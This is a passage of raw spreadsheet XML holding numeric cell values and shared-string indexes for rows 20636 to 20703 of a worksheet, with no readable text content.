      <c r="C20636" s="2" t="s">
        <v>19910</v>
      </c>
      <c r="D20636" s="2">
        <v>1.0</v>
      </c>
      <c r="E20636" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20636" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20637" ht="15.75" customHeight="1">
      <c r="A20637" s="1">
        <v>3593.0</v>
      </c>
      <c r="B20637" s="2">
        <v>3.9064193E7</v>
      </c>
      <c r="C20637" s="2" t="s">
        <v>19911</v>
      </c>
      <c r="D20637" s="2">
        <v>1.0</v>
      </c>
      <c r="E20637" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20637" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20638" ht="15.75" customHeight="1">
      <c r="A20638" s="1">
        <v>4039.0</v>
      </c>
      <c r="B20638" s="2">
        <v>4.1041287E7</v>
      </c>
      <c r="C20638" s="2" t="s">
        <v>19912</v>
      </c>
      <c r="D20638" s="2">
        <v>1.0</v>
      </c>
      <c r="E20638" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20638" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20639" ht="15.75" customHeight="1">
      <c r="A20639" s="1">
        <v>4224.0</v>
      </c>
      <c r="B20639" s="2">
        <v>4.1748937E7</v>
      </c>
      <c r="C20639" s="2" t="s">
        <v>19913</v>
      </c>
      <c r="D20639" s="2">
        <v>1.0</v>
      </c>
      <c r="E20639" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20639" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20640" ht="15.75" customHeight="1">
      <c r="A20640" s="1">
        <v>4331.0</v>
      </c>
      <c r="B20640" s="2">
        <v>4.2048158E7</v>
      </c>
      <c r="C20640" s="2" t="s">
        <v>19914</v>
      </c>
      <c r="D20640" s="2">
        <v>1.0</v>
      </c>
      <c r="E20640" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20640" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20641" ht="15.75" customHeight="1">
      <c r="A20641" s="1">
        <v>4376.0</v>
      </c>
      <c r="B20641" s="2">
        <v>4.2145566E7</v>
      </c>
      <c r="C20641" s="2" t="s">
        <v>19915</v>
      </c>
      <c r="D20641" s="2">
        <v>1.0</v>
      </c>
      <c r="E20641" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20641" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20642" ht="15.75" customHeight="1">
      <c r="A20642" s="1">
        <v>4660.0</v>
      </c>
      <c r="B20642" s="2">
        <v>4.3133642E7</v>
      </c>
      <c r="C20642" s="2" t="s">
        <v>19916</v>
      </c>
      <c r="D20642" s="2">
        <v>1.0</v>
      </c>
      <c r="E20642" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20642" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20643" ht="15.75" customHeight="1">
      <c r="A20643" s="1">
        <v>4914.0</v>
      </c>
      <c r="B20643" s="2">
        <v>4.3937226E7</v>
      </c>
      <c r="C20643" s="2" t="s">
        <v>19917</v>
      </c>
      <c r="D20643" s="2">
        <v>1.0</v>
      </c>
      <c r="E20643" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20643" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20644" ht="15.75" customHeight="1">
      <c r="A20644" s="1">
        <v>4964.0</v>
      </c>
      <c r="B20644" s="2">
        <v>4.4076742E7</v>
      </c>
      <c r="C20644" s="2" t="s">
        <v>19918</v>
      </c>
      <c r="D20644" s="2">
        <v>1.0</v>
      </c>
      <c r="E20644" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20644" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20645" ht="15.75" customHeight="1">
      <c r="A20645" s="1">
        <v>5079.0</v>
      </c>
      <c r="B20645" s="2">
        <v>4.4455164E7</v>
      </c>
      <c r="C20645" s="2" t="s">
        <v>19919</v>
      </c>
      <c r="D20645" s="2">
        <v>1.0</v>
      </c>
      <c r="E20645" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20645" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20646" ht="15.75" customHeight="1">
      <c r="A20646" s="1">
        <v>5377.0</v>
      </c>
      <c r="B20646" s="2">
        <v>4.5397319E7</v>
      </c>
      <c r="C20646" s="2" t="s">
        <v>19920</v>
      </c>
      <c r="D20646" s="2">
        <v>1.0</v>
      </c>
      <c r="E20646" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20646" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20647" ht="15.75" customHeight="1">
      <c r="A20647" s="1">
        <v>5690.0</v>
      </c>
      <c r="B20647" s="2">
        <v>4.6435014E7</v>
      </c>
      <c r="C20647" s="2" t="s">
        <v>19921</v>
      </c>
      <c r="D20647" s="2">
        <v>1.0</v>
      </c>
      <c r="E20647" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20647" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20648" ht="15.75" customHeight="1">
      <c r="A20648" s="1">
        <v>5695.0</v>
      </c>
      <c r="B20648" s="2">
        <v>4.6502102E7</v>
      </c>
      <c r="C20648" s="2" t="s">
        <v>19922</v>
      </c>
      <c r="D20648" s="2">
        <v>1.0</v>
      </c>
      <c r="E20648" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20648" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20649" ht="15.75" customHeight="1">
      <c r="A20649" s="1">
        <v>6115.0</v>
      </c>
      <c r="B20649" s="2">
        <v>4.7771041E7</v>
      </c>
      <c r="C20649" s="2" t="s">
        <v>19923</v>
      </c>
      <c r="D20649" s="2">
        <v>1.0</v>
      </c>
      <c r="E20649" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20649" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20650" ht="15.75" customHeight="1">
      <c r="A20650" s="1">
        <v>6357.0</v>
      </c>
      <c r="B20650" s="2">
        <v>4.832691E7</v>
      </c>
      <c r="C20650" s="2" t="s">
        <v>19924</v>
      </c>
      <c r="D20650" s="2">
        <v>1.0</v>
      </c>
      <c r="E20650" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20650" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20651" ht="15.75" customHeight="1">
      <c r="A20651" s="1">
        <v>6655.0</v>
      </c>
      <c r="B20651" s="2">
        <v>4.909662E7</v>
      </c>
      <c r="C20651" s="2" t="s">
        <v>19925</v>
      </c>
      <c r="D20651" s="2">
        <v>1.0</v>
      </c>
      <c r="E20651" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20651" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20652" ht="15.75" customHeight="1">
      <c r="A20652" s="1">
        <v>6796.0</v>
      </c>
      <c r="B20652" s="2">
        <v>4.9516472E7</v>
      </c>
      <c r="C20652" s="2" t="s">
        <v>19926</v>
      </c>
      <c r="D20652" s="2">
        <v>1.0</v>
      </c>
      <c r="E20652" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20652" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20653" ht="15.75" customHeight="1">
      <c r="A20653" s="1">
        <v>6802.0</v>
      </c>
      <c r="B20653" s="2">
        <v>4.9521207E7</v>
      </c>
      <c r="C20653" s="2" t="s">
        <v>19927</v>
      </c>
      <c r="D20653" s="2">
        <v>1.0</v>
      </c>
      <c r="E20653" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20653" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20654" ht="15.75" customHeight="1">
      <c r="A20654" s="1">
        <v>6819.0</v>
      </c>
      <c r="B20654" s="2">
        <v>4.9541194E7</v>
      </c>
      <c r="C20654" s="2" t="s">
        <v>19928</v>
      </c>
      <c r="D20654" s="2">
        <v>1.0</v>
      </c>
      <c r="E20654" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20654" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20655" ht="15.75" customHeight="1">
      <c r="A20655" s="1">
        <v>7357.0</v>
      </c>
      <c r="B20655" s="2">
        <v>5.099996E7</v>
      </c>
      <c r="C20655" s="2" t="s">
        <v>19929</v>
      </c>
      <c r="D20655" s="2">
        <v>1.0</v>
      </c>
      <c r="E20655" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20655" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20656" ht="15.75" customHeight="1">
      <c r="A20656" s="1">
        <v>7373.0</v>
      </c>
      <c r="B20656" s="2">
        <v>5.1040297E7</v>
      </c>
      <c r="C20656" s="2" t="s">
        <v>19930</v>
      </c>
      <c r="D20656" s="2">
        <v>1.0</v>
      </c>
      <c r="E20656" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20656" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20657" ht="15.75" customHeight="1">
      <c r="A20657" s="1">
        <v>8067.0</v>
      </c>
      <c r="B20657" s="2">
        <v>5.2932293E7</v>
      </c>
      <c r="C20657" s="2" t="s">
        <v>19931</v>
      </c>
      <c r="D20657" s="2">
        <v>1.0</v>
      </c>
      <c r="E20657" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20657" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20658" ht="15.75" customHeight="1">
      <c r="A20658" s="1">
        <v>8189.0</v>
      </c>
      <c r="B20658" s="2">
        <v>5.325099E7</v>
      </c>
      <c r="C20658" s="2" t="s">
        <v>19932</v>
      </c>
      <c r="D20658" s="2">
        <v>1.0</v>
      </c>
      <c r="E20658" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20658" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20659" ht="15.75" customHeight="1">
      <c r="A20659" s="1">
        <v>8304.0</v>
      </c>
      <c r="B20659" s="2">
        <v>5.3579983E7</v>
      </c>
      <c r="C20659" s="2" t="s">
        <v>19933</v>
      </c>
      <c r="D20659" s="2">
        <v>1.0</v>
      </c>
      <c r="E20659" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20659" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20660" ht="15.75" customHeight="1">
      <c r="A20660" s="1">
        <v>8350.0</v>
      </c>
      <c r="B20660" s="2">
        <v>5.3744869E7</v>
      </c>
      <c r="C20660" s="2" t="s">
        <v>19934</v>
      </c>
      <c r="D20660" s="2">
        <v>1.0</v>
      </c>
      <c r="E20660" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20660" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20661" ht="15.75" customHeight="1">
      <c r="A20661" s="1">
        <v>8355.0</v>
      </c>
      <c r="B20661" s="2">
        <v>5.375795E7</v>
      </c>
      <c r="C20661" s="2" t="s">
        <v>19935</v>
      </c>
      <c r="D20661" s="2">
        <v>1.0</v>
      </c>
      <c r="E20661" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20661" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20662" ht="15.75" customHeight="1">
      <c r="A20662" s="1">
        <v>8595.0</v>
      </c>
      <c r="B20662" s="2">
        <v>5.4245181E7</v>
      </c>
      <c r="C20662" s="2" t="s">
        <v>19936</v>
      </c>
      <c r="D20662" s="2">
        <v>1.0</v>
      </c>
      <c r="E20662" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20662" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20663" ht="15.75" customHeight="1">
      <c r="A20663" s="1">
        <v>8817.0</v>
      </c>
      <c r="B20663" s="2">
        <v>5.4634584E7</v>
      </c>
      <c r="C20663" s="2" t="s">
        <v>19937</v>
      </c>
      <c r="D20663" s="2">
        <v>1.0</v>
      </c>
      <c r="E20663" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20663" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20664" ht="15.75" customHeight="1">
      <c r="A20664" s="1">
        <v>9225.0</v>
      </c>
      <c r="B20664" s="2">
        <v>5.5436897E7</v>
      </c>
      <c r="C20664" s="2" t="s">
        <v>19938</v>
      </c>
      <c r="D20664" s="2">
        <v>1.0</v>
      </c>
      <c r="E20664" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20664" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20665" ht="15.75" customHeight="1">
      <c r="A20665" s="1">
        <v>9735.0</v>
      </c>
      <c r="B20665" s="2">
        <v>5.6451604E7</v>
      </c>
      <c r="C20665" s="2" t="s">
        <v>19939</v>
      </c>
      <c r="D20665" s="2">
        <v>1.0</v>
      </c>
      <c r="E20665" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20665" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20666" ht="15.75" customHeight="1">
      <c r="A20666" s="1">
        <v>10138.0</v>
      </c>
      <c r="B20666" s="2">
        <v>5.7304809E7</v>
      </c>
      <c r="C20666" s="2" t="s">
        <v>19940</v>
      </c>
      <c r="D20666" s="2">
        <v>1.0</v>
      </c>
      <c r="E20666" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20666" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20667" ht="15.75" customHeight="1">
      <c r="A20667" s="1">
        <v>10350.0</v>
      </c>
      <c r="B20667" s="2">
        <v>6680655.0</v>
      </c>
      <c r="C20667" s="2" t="s">
        <v>19941</v>
      </c>
      <c r="D20667" s="2">
        <v>1.0</v>
      </c>
      <c r="E20667" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20667" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20668" ht="15.75" customHeight="1">
      <c r="A20668" s="1">
        <v>10445.0</v>
      </c>
      <c r="B20668" s="2">
        <v>1.0508507E7</v>
      </c>
      <c r="C20668" s="2" t="s">
        <v>19942</v>
      </c>
      <c r="D20668" s="2">
        <v>1.0</v>
      </c>
      <c r="E20668" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20668" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20669" ht="15.75" customHeight="1">
      <c r="A20669" s="1">
        <v>10707.0</v>
      </c>
      <c r="B20669" s="2">
        <v>1.4916516E7</v>
      </c>
      <c r="C20669" s="2" t="s">
        <v>19943</v>
      </c>
      <c r="D20669" s="2">
        <v>1.0</v>
      </c>
      <c r="E20669" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20669" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20670" ht="15.75" customHeight="1">
      <c r="A20670" s="1">
        <v>11064.0</v>
      </c>
      <c r="B20670" s="2">
        <v>1.8253598E7</v>
      </c>
      <c r="C20670" s="2" t="s">
        <v>19944</v>
      </c>
      <c r="D20670" s="2">
        <v>1.0</v>
      </c>
      <c r="E20670" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20670" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20671" ht="15.75" customHeight="1">
      <c r="A20671" s="1">
        <v>11215.0</v>
      </c>
      <c r="B20671" s="2">
        <v>2.0218562E7</v>
      </c>
      <c r="C20671" s="2" t="s">
        <v>19945</v>
      </c>
      <c r="D20671" s="2">
        <v>1.0</v>
      </c>
      <c r="E20671" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20671" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20672" ht="15.75" customHeight="1">
      <c r="A20672" s="1">
        <v>11253.0</v>
      </c>
      <c r="B20672" s="2">
        <v>2.0535381E7</v>
      </c>
      <c r="C20672" s="2" t="s">
        <v>19946</v>
      </c>
      <c r="D20672" s="2">
        <v>1.0</v>
      </c>
      <c r="E20672" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20672" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20673" ht="15.75" customHeight="1">
      <c r="A20673" s="1">
        <v>11394.0</v>
      </c>
      <c r="B20673" s="2">
        <v>2.1559445E7</v>
      </c>
      <c r="C20673" s="2" t="s">
        <v>19947</v>
      </c>
      <c r="D20673" s="2">
        <v>1.0</v>
      </c>
      <c r="E20673" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20673" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20674" ht="15.75" customHeight="1">
      <c r="A20674" s="1">
        <v>11398.0</v>
      </c>
      <c r="B20674" s="2">
        <v>2.1588147E7</v>
      </c>
      <c r="C20674" s="2" t="s">
        <v>19948</v>
      </c>
      <c r="D20674" s="2">
        <v>1.0</v>
      </c>
      <c r="E20674" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20674" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20675" ht="15.75" customHeight="1">
      <c r="A20675" s="1">
        <v>11711.0</v>
      </c>
      <c r="B20675" s="2">
        <v>2.3626485E7</v>
      </c>
      <c r="C20675" s="2" t="s">
        <v>19949</v>
      </c>
      <c r="D20675" s="2">
        <v>1.0</v>
      </c>
      <c r="E20675" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20675" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20676" ht="15.75" customHeight="1">
      <c r="A20676" s="1">
        <v>11891.0</v>
      </c>
      <c r="B20676" s="2">
        <v>2.5099495E7</v>
      </c>
      <c r="C20676" s="2" t="s">
        <v>19950</v>
      </c>
      <c r="D20676" s="2">
        <v>1.0</v>
      </c>
      <c r="E20676" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20676" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20677" ht="15.75" customHeight="1">
      <c r="A20677" s="1">
        <v>12047.0</v>
      </c>
      <c r="B20677" s="2">
        <v>2.6362399E7</v>
      </c>
      <c r="C20677" s="2" t="s">
        <v>19951</v>
      </c>
      <c r="D20677" s="2">
        <v>1.0</v>
      </c>
      <c r="E20677" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20677" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20678" ht="15.75" customHeight="1">
      <c r="A20678" s="1">
        <v>12081.0</v>
      </c>
      <c r="B20678" s="2">
        <v>2.6703173E7</v>
      </c>
      <c r="C20678" s="2" t="s">
        <v>19952</v>
      </c>
      <c r="D20678" s="2">
        <v>1.0</v>
      </c>
      <c r="E20678" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20678" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20679" ht="15.75" customHeight="1">
      <c r="A20679" s="1">
        <v>12439.0</v>
      </c>
      <c r="B20679" s="2">
        <v>2.9251264E7</v>
      </c>
      <c r="C20679" s="2" t="s">
        <v>19953</v>
      </c>
      <c r="D20679" s="2">
        <v>1.0</v>
      </c>
      <c r="E20679" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20679" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20680" ht="15.75" customHeight="1">
      <c r="A20680" s="1">
        <v>12514.0</v>
      </c>
      <c r="B20680" s="2">
        <v>2.9661146E7</v>
      </c>
      <c r="C20680" s="2" t="s">
        <v>19954</v>
      </c>
      <c r="D20680" s="2">
        <v>1.0</v>
      </c>
      <c r="E20680" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20680" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20681" ht="15.75" customHeight="1">
      <c r="A20681" s="1">
        <v>12734.0</v>
      </c>
      <c r="B20681" s="2">
        <v>3.1021267E7</v>
      </c>
      <c r="C20681" s="2" t="s">
        <v>19955</v>
      </c>
      <c r="D20681" s="2">
        <v>1.0</v>
      </c>
      <c r="E20681" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20681" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20682" ht="15.75" customHeight="1">
      <c r="A20682" s="1">
        <v>12784.0</v>
      </c>
      <c r="B20682" s="2">
        <v>3.1364723E7</v>
      </c>
      <c r="C20682" s="2" t="s">
        <v>19956</v>
      </c>
      <c r="D20682" s="2">
        <v>1.0</v>
      </c>
      <c r="E20682" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20682" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20683" ht="15.75" customHeight="1">
      <c r="A20683" s="1">
        <v>12979.0</v>
      </c>
      <c r="B20683" s="2">
        <v>3.2664868E7</v>
      </c>
      <c r="C20683" s="2" t="s">
        <v>19957</v>
      </c>
      <c r="D20683" s="2">
        <v>1.0</v>
      </c>
      <c r="E20683" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20683" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20684" ht="15.75" customHeight="1">
      <c r="A20684" s="1">
        <v>13180.0</v>
      </c>
      <c r="B20684" s="2">
        <v>3.4024843E7</v>
      </c>
      <c r="C20684" s="2" t="s">
        <v>19958</v>
      </c>
      <c r="D20684" s="2">
        <v>1.0</v>
      </c>
      <c r="E20684" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20684" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20685" ht="15.75" customHeight="1">
      <c r="A20685" s="1">
        <v>13242.0</v>
      </c>
      <c r="B20685" s="2">
        <v>3.4265174E7</v>
      </c>
      <c r="C20685" s="2" t="s">
        <v>19959</v>
      </c>
      <c r="D20685" s="2">
        <v>1.0</v>
      </c>
      <c r="E20685" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20685" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20686" ht="15.75" customHeight="1">
      <c r="A20686" s="1">
        <v>13370.0</v>
      </c>
      <c r="B20686" s="2">
        <v>3.4829527E7</v>
      </c>
      <c r="C20686" s="2" t="s">
        <v>19960</v>
      </c>
      <c r="D20686" s="2">
        <v>1.0</v>
      </c>
      <c r="E20686" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20686" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20687" ht="15.75" customHeight="1">
      <c r="A20687" s="1">
        <v>13427.0</v>
      </c>
      <c r="B20687" s="2">
        <v>3.5084558E7</v>
      </c>
      <c r="C20687" s="2" t="s">
        <v>19961</v>
      </c>
      <c r="D20687" s="2">
        <v>1.0</v>
      </c>
      <c r="E20687" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20687" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20688" ht="15.75" customHeight="1">
      <c r="A20688" s="1">
        <v>13728.0</v>
      </c>
      <c r="B20688" s="2">
        <v>3.6381016E7</v>
      </c>
      <c r="C20688" s="2" t="s">
        <v>19962</v>
      </c>
      <c r="D20688" s="2">
        <v>1.0</v>
      </c>
      <c r="E20688" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20688" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20689" ht="15.75" customHeight="1">
      <c r="A20689" s="1">
        <v>13860.0</v>
      </c>
      <c r="B20689" s="2">
        <v>3.6933779E7</v>
      </c>
      <c r="C20689" s="2" t="s">
        <v>19963</v>
      </c>
      <c r="D20689" s="2">
        <v>1.0</v>
      </c>
      <c r="E20689" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20689" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20690" ht="15.75" customHeight="1">
      <c r="A20690" s="1">
        <v>13871.0</v>
      </c>
      <c r="B20690" s="2">
        <v>3.695708E7</v>
      </c>
      <c r="C20690" s="2" t="s">
        <v>19964</v>
      </c>
      <c r="D20690" s="2">
        <v>1.0</v>
      </c>
      <c r="E20690" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20690" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20691" ht="15.75" customHeight="1">
      <c r="A20691" s="1">
        <v>14034.0</v>
      </c>
      <c r="B20691" s="2">
        <v>3.750169E7</v>
      </c>
      <c r="C20691" s="2" t="s">
        <v>19965</v>
      </c>
      <c r="D20691" s="2">
        <v>1.0</v>
      </c>
      <c r="E20691" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20691" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20692" ht="15.75" customHeight="1">
      <c r="A20692" s="1">
        <v>14378.0</v>
      </c>
      <c r="B20692" s="2">
        <v>3.9009218E7</v>
      </c>
      <c r="C20692" s="2" t="s">
        <v>19966</v>
      </c>
      <c r="D20692" s="2">
        <v>1.0</v>
      </c>
      <c r="E20692" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20692" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20693" ht="15.75" customHeight="1">
      <c r="A20693" s="1">
        <v>15024.0</v>
      </c>
      <c r="B20693" s="2">
        <v>4.1550528E7</v>
      </c>
      <c r="C20693" s="2" t="s">
        <v>19967</v>
      </c>
      <c r="D20693" s="2">
        <v>1.0</v>
      </c>
      <c r="E20693" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20693" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20694" ht="15.75" customHeight="1">
      <c r="A20694" s="1">
        <v>15144.0</v>
      </c>
      <c r="B20694" s="2">
        <v>4.1930191E7</v>
      </c>
      <c r="C20694" s="2" t="s">
        <v>19968</v>
      </c>
      <c r="D20694" s="2">
        <v>1.0</v>
      </c>
      <c r="E20694" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20694" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20695" ht="15.75" customHeight="1">
      <c r="A20695" s="1">
        <v>15194.0</v>
      </c>
      <c r="B20695" s="2">
        <v>4.2056857E7</v>
      </c>
      <c r="C20695" s="2" t="s">
        <v>19969</v>
      </c>
      <c r="D20695" s="2">
        <v>1.0</v>
      </c>
      <c r="E20695" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20695" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20696" ht="15.75" customHeight="1">
      <c r="A20696" s="1">
        <v>15666.0</v>
      </c>
      <c r="B20696" s="2">
        <v>4.3721908E7</v>
      </c>
      <c r="C20696" s="2" t="s">
        <v>19970</v>
      </c>
      <c r="D20696" s="2">
        <v>1.0</v>
      </c>
      <c r="E20696" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20696" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20697" ht="15.75" customHeight="1">
      <c r="A20697" s="1">
        <v>16034.0</v>
      </c>
      <c r="B20697" s="2">
        <v>4.5117157E7</v>
      </c>
      <c r="C20697" s="2" t="s">
        <v>19971</v>
      </c>
      <c r="D20697" s="2">
        <v>1.0</v>
      </c>
      <c r="E20697" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20697" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20698" ht="15.75" customHeight="1">
      <c r="A20698" s="1">
        <v>16036.0</v>
      </c>
      <c r="B20698" s="2">
        <v>4.5125053E7</v>
      </c>
      <c r="C20698" s="2" t="s">
        <v>19972</v>
      </c>
      <c r="D20698" s="2">
        <v>1.0</v>
      </c>
      <c r="E20698" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20698" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20699" ht="15.75" customHeight="1">
      <c r="A20699" s="1">
        <v>16087.0</v>
      </c>
      <c r="B20699" s="2">
        <v>4.5384586E7</v>
      </c>
      <c r="C20699" s="2" t="s">
        <v>19973</v>
      </c>
      <c r="D20699" s="2">
        <v>1.0</v>
      </c>
      <c r="E20699" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20699" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20700" ht="15.75" customHeight="1">
      <c r="A20700" s="1">
        <v>16143.0</v>
      </c>
      <c r="B20700" s="2">
        <v>4.5568833E7</v>
      </c>
      <c r="C20700" s="2" t="s">
        <v>19974</v>
      </c>
      <c r="D20700" s="2">
        <v>1.0</v>
      </c>
      <c r="E20700" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20700" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20701" ht="15.75" customHeight="1">
      <c r="A20701" s="1">
        <v>16390.0</v>
      </c>
      <c r="B20701" s="2">
        <v>4.6235613E7</v>
      </c>
      <c r="C20701" s="2" t="s">
        <v>19975</v>
      </c>
      <c r="D20701" s="2">
        <v>1.0</v>
      </c>
      <c r="E20701" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20701" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20702" ht="15.75" customHeight="1">
      <c r="A20702" s="1">
        <v>16548.0</v>
      </c>
      <c r="B20702" s="2">
        <v>4.6807992E7</v>
      </c>
      <c r="C20702" s="2" t="s">
        <v>19976</v>
      </c>
      <c r="D20702" s="2">
        <v>1.0</v>
      </c>
      <c r="E20702" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20702" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20703" ht="15.75" customHeight="1">
      <c r="A20703" s="1">
        <v>16628.0</v>
      </c>
      <c r="B20703" s="2">
        <v>4.7071087E7</v>
      </c>
